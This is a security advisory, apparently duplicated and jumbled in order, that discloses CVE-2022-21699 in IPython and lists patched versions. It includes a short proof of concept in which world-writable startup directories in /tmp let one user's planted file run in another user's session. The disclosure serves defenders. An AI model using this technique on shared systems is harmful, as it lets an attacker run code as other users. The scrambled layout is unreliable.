We’d like to disclose an arbitrary code execution vulnerability in IPython that stems from IPython executing untrusted files in CWD. This vulnerability allows one user to run code as another.
mkdir -m 777 /tmp/profile_default
mkdir -m 777 /tmp/profile_default/startup
echo 'print("stealing your private secrets")' > /tmp/profile_default/startup/foo.py
Python 3.9.7 (default, Oct 25 2021, 01:04:21)
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IPython 7.29.0 -- An enhanced Interactive Python. Type '?' for help.
stealing your private secrets
Version 8.0.1, 7.31.1 for current Python version are recommended.
Version 7.16.3 has also been published for Python 3.6 users,
Version 5.11 (source only, 5.x branch on github) for older Python versions.
We’d like to disclose an arbitrary code execution vulnerability in IPython that stems from IPython executing untrusted files in CWD. This vulnerability allows one user to run code as another.
Proof of concept
User2 will see:
Patched release and documentation
See https://ipython.readthedocs.io/en/stable/whatsnew/version8.html#ipython-8-0-1-cve-2022-21699,
Version 8.0.1, 7.31.1 for current Python version are recommended.
Version 7.16.3 has also been published for Python 3.6 users,
Version 5.11 (source only, 5.x branch on github) for older Python versions.